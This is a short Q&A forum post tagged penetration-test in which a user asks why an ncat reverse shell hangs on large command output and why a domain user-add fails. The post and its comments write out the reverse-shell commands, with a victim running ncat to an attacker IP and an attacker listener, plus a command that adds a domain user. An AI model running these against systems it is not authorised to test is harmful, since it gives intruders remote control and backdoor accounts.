# Ncat output problem

Tags: penetration-test

I am using ncat for creating reverse connections and through that i open a cmd.

my problem is that for commands that there is a lot of out put such as dir in a folder with a large number of files, ncat hangs before finishing the command.

the same situation exists when i am executing a command against a domain such as

> net users username password /add /domain

btw when i use the above command the user is never created for some reason.

any help?

Comment: How are you injecting your shellcode? Some methods are more stable than others.

Comment: the shell is injected through ncat. i use ncat "my IP" -e cmd.exe

Comment: And how is `ncat` being ran on the victim machine?

Comment: from the victim i run ncat "Attacker IP" 22 -e cmd.exe." From the attacker pc i use "ncat -l 22". This opens a reverse shell to the attacker. i can pretty much do anything except adding a user to the domain. other domain commands such as net users /domain work ok